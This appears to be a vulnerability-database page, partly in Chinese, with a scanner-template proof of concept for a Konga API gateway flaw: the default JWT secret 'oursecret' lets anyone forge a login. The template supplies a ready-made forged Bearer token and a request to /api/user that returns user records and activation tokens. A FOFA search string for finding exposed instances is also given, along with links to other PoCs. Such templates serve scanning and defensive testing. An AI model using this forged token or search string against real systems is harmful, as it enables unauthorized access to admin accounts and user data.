konga-default-jwt-key: KONGA Arbitrary user login vulnerability

漏洞描述

PoC代码[已公开]

id: konga-default-jwt-key

info:
  name: KONGA Arbitrary user login vulnerability
  author: wys
  severity: high
  verified: true
  description: |-
    The default key of Konga JWT is oursecret, which can forge arbitrary user permissions
    fofa: app="Konga-Api-Gateway"
  reference:
    - https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg
    - https://github.com/pantsel/konga
  tags: kong,jwt,default
  created: 2023/07/31

rules:
  r0:
    request:
      method: GET
      path: /api/user
      headers:
        Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4
    expression: response.status == 200 && response.body.bcontains(b'"createdUser":') && response.body.bcontains(b'"username":') && response.body.bcontains(b'"activationToken":')
expression: r0()

相关漏洞推荐

• POC CVE-2024-6220: WordPress Keydatas ≤ 2.5.2 - Arbitrary File Upload
• POC CVE-2025-47445: WordPress Eventin (Themewinter) ≤ 4.0.26 - Arbitrary File Download
• motionEye /login/ 默认口令漏洞
• POC CVE-2021-4449: ZoomSounds Plugin - Unauthenticated Arbitrary File Upload
• POC redis-commander-default-login: Redis Commander - Default Login
• POC traggo-default-login: Traggo - Default Login
• POC cluster-trino-admin-login: Cluster Overview Trino - Admin Login
• POC yonyou-u9-patchfile-upload: Yonyou U9 PatchFile.asmx - Unauthenticated Arbitrary File Upload
• 万户OA /defaultroot/modules/govoffice/gov_documentmanager/govdocumentmanager_sendfile_gd.jsp;.js SQL 注入漏洞
• Dataiku DSS /dip/api/login 默认口令漏洞
• lsfusion /login_check 默认口令漏洞
• 天锐绿盾审批系统 /trwfe/login.jsp/.%2e/invoker/findCategoryPage.do SQL 注入漏洞
• 用友NC存在 oncelogin/getAuth SQL注入漏洞